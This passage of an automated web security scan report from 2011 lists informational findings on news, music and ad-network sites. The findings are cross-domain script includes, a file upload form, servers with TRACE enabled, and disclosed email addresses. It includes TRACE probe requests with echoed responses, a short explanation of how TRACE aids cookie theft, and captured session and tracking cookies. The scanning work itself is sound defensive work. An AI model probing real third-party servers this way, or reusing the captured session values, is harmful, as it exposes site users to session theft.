User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mainPage=/business

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Location: http://www.orlandosentinel.com/hive/error/notfound.jsp
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: private, max-age=180
Date: Mon, 09 May 2011 13:59:31 GMT
Connection: close
Content-Length: 130184


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   <meta http-equiv="X-UA-Compatible" con
...[SNIP]...
</script>
   <script language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...
<!-- Tacoda Javascript -->

<SCRIPT SRC="http://an.tacoda.net/an/g10007/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=B08725"></script>
...[SNIP]...

16.29. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandosentinel.com
Path:   /hive/common/includes/google-adsense-content-orlnews.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hive/common/includes/google-adsense-content-orlnews.html?client=ca-tribune_news3_html&google_ad_channel=Orlandosentinel_story_pos1&type=wide&page_url=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,2290449,print.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mainPage=/business; __switchTo5x=97; __unam=23536f-12fd50e4220-5f39d80-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Expires: Mon, 09 May 2011 13:59:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4445

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Google Ads</title>
<link href="/hive/stylesheets/sponsoredlinks-orlnews.css" media="all
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

16.30. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kxuwnfahnyntrb45nyzhom55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 269864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://whistleout.s3.amazonaws.com/public/css/widget-v3/widget_vine_625x125.css" />

<script type="text/javascript" src="http://whistleout.s3.amazonaws.com/public/script/widget/widget.js"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag (tile=1) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=1;tile=1;dcopt=ist;sz=468x60,728x90;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=10) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=top;tile=2;sz=120x30;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=7) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=top;tile=3;sz=940x1;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=9) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=top;tile=4;sz=290x50;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=2) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=island;pos=1;tile=5;sz=300x250;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=5) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;pos=1;tile=6;sz=295x60;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=5) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;pos=2;tile=7;sz=295x60;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=2) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=island;pos=2;tile=8;sz=300x250;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=1) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=2;tile=9;sz=468x60,728x90;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=8) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=top;tile=10;sz=1x11;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-au.imrworldwide.com/v53.js"></script>
...[SNIP]...

17. File upload functionality

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1304703476/build/system/upload.html

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /1304703476/build/system/upload.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:13:03 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
X-Varnish: 2794960096
Cache-Control: max-age=2370975
Expires: Mon, 06 Jun 2011 00:37:40 GMT
Date: Mon, 09 May 2011 14:01:25 GMT
Connection: close
Content-Length: 13708

<html>
<head>
<meta charset="utf-8">
<title></title>


<style type="text/css">
html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,a
...[SNIP]...
<!-- dynamic -->
<input type="file" name="attachment" onchange="mediaUploadRpc.onUploadStart();this.parentNode.submit();" />
<input type="hidden" name="id" value="" />
...[SNIP]...

18. TRACE method is enabled
There are 6 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


18.1. http://alvenda.122.2o7.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: alvenda.122.2o7.net
Cookie: ce41e1c3f36467de

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:53 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: alvenda.122.2o7.net
Cookie: ce41e1c3f36467de
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


18.2. http://ie-stat.bmmetrix.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ie-stat.bmmetrix.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ie-stat.bmmetrix.com
Cookie: 4f1ab55c4b9b1e12

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:51 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ie-stat.bmmetrix.com
Cookie: 4f1ab55c4b9b1e12


18.3. http://imp.fetchback.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: c1307d2052afdace

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:32 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: c1307d2052afdace


18.4. http://ipcmedia.122.2o7.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipcmedia.122.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: ipcmedia.122.2o7.net
Cookie: aaa62a00c24e0275

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:02 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ipcmedia.122.2o7.net
Cookie: aaa62a00c24e0275
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


18.5. http://optimized-by.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: b19987d2c7c41052

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:22 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: b19987d2c7c41052
Host: optimized-by.rubiconproject.com
X-Forwarded-For: 173.193.214.243


18.6. http://secure-au.imrworldwide.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-au.imrworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure-au.imrworldwide.com
Cookie: 52703e1c43f9a364

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 52703e1c43f9a364
Host: secure-au.imrworldwide.com


19. Email addresses disclosed
There are 18 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


19.1. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; 
fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 10-May-2011 14:00:11 GMT
Set-Cookie: rb2=...[SNIP]...; path=/; domain=.adbrite.com; expires=Sun, 07-Aug-2011 14:00:11 GMT
Set-Cookie: ut="1%3AXZDJloMgEEX%2FhbULhiie%2FI0EokQGGRKPCfn3Bjr2ib293Ee9qhd4YHB%2BgVlsq%2FU8gDPwq9L3hJwOlCaUYFNAKGChvILLNPWjg8MjQzVGnXBiTZDSkGIxWGMJ3WZYXNPOuI3j75PILuaNc%2BS5ZtITrzJB7e5d7cHbqT7QoIRSmbC42kRTx8ifaP7FVSe37lQoh3dV24eZxKVozqBa9KRtLuq1NXW44%2F1ny%2FqlbI%2BzcfA5tmxXY9KQEIrP%2FR4CF3OC41e8o5fvOGgAG4wRXtZTg%2Ff7Bw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 06-May-2021 14:00:11 GMT
Set-Cookie: vsd=0@1@4dc7f36b@cdn.turn.com; path=/; domain=.adbrite.com; expires=Wed, 11-May-2011 14:00:11 GMT
Set-Cookie: fq=; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 14:00:11 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

19.2. http://asthmatickitty.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://www.sufjan.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 39321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Asthmatic Kitty Records : Home</title>
<script src="/mint/?js" type="text/javascript"></script>

<script language
...[SNIP]...
<a href="mailto:info@asthmatickitty.com">
...[SNIP]...
<br>
info@asthmatickitty.com</a>
...[SNIP]...

19.3. http://asthmatickitty.com/news.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /news.php

Issue detail

The following email address was disclosed in the response:

Request

GET /news.php HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MintAcceptsCookies=1; __utmz=1.1304949953.1.1.utmcsr=sufjan.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.851040495.1304949953.1304949953.1304949953.1; __utmc=1; __utmb=1.1.10.1304949953; MintUnique=1; MintUniqueHour=1304949600; MintUniqueDay=1304917200; MintUniqueWeek=1304830800; MintUniqueMonth=1304226000; MintUniqueLocation=1; MintCrush=-409446192

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 147990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Asthmatic Kitty Records</title>
<script src="/mint/?js" type="text/javascript"></script>
<script language="JavaScr
...[SNIP]...
<a href="mailto:info@asthmatickitty.com">
...[SNIP]...
<br>
info@asthmatickitty.com</a>
...[SNIP]...

19.4. http://cdn11.surphace.com/javascript/omniture_h15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn11.surphace.com
Path:   /javascript/omniture_h15.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascript/omniture_h15.js HTTP/1.1
Host: cdn11.surphace.com
Proxy-Connection: keep-alive
Referer: http://widgets.surphace.com/partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel&evt=fireSphereOmInitAction&omid=501482
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Fri, 06 May 2011 19:44:29 GMT
X-Machine: web18
Content-Type: application/javascript
X-Forwarded-For: 72.246.64.167
Content-Length: 38862
X-Varnish: 872164619 871035654
Date: Mon, 09 May 2011 13:59:58 GMT
Connection: close

/* SiteCatalyst code version: H.15.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com - updated 9/10/2008*/
/************************ ADDITIONAL FEATURES *************
...[SNIP]...
)`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=^
...[SNIP]...

19.5. http://mediacdn.disqus.com/1304703476/build/system/disqus.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1304703476/build/system/disqus.js

Issue detail

The following email address was disclosed in the response:

Request

GET /1304703476/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:13:15 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
X-Varnish: 2794956330 2794955461
Cache-Control: max-age=2371001
Expires: Mon, 06 Jun 2011 00:37:40 GMT
Date: Mon, 09 May 2011 14:00:59 GMT
Connection: close
Content-Length: 188344

DISQUS.dtpl=(function(){var b={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>"};b.getGuestFields=function(g){function f(h){return DISQUS.nodes.get("#"+h+(g?"-"+g:""))}return{name:f("dsq-field
...[SNIP]...

19.6. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /cim/script/cim_v92_cim_11_8_0.en.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cim/script/cim_v92_cim_11_8_0.en.js?1303937101 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "2176889624"
If-Modified-Since: Thu, 21 Apr 2011 23:08:27 GMT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Accept-Ranges: bytes
ETag: "2176889624"
Last-Modified: Thu, 21 Apr 2011 23:08:27 GMT
Date: Mon, 09 May 2011 14:00:39 GMT
Server: lighttpd/1.4.19
Vary: Accept-Encoding
Cache-Control: private, max-age=604800
Age: 468139
Expires: Wed, 11 May 2011 03:58:20 GMT
Connection: Keep-Alive
Content-Length: 241537

// Copyright 2005-2010 Meebo, inc.
//
// RSA javascript implementation Copyright 1998-2005 David Shapiro
// please see http://www.ohdave.com/rsa/
// SHA256 javascript implementation Copyright 2003-200
...[SNIP]...
<a href="mailto:ad-feedback@meebo-inc.com?subject='+
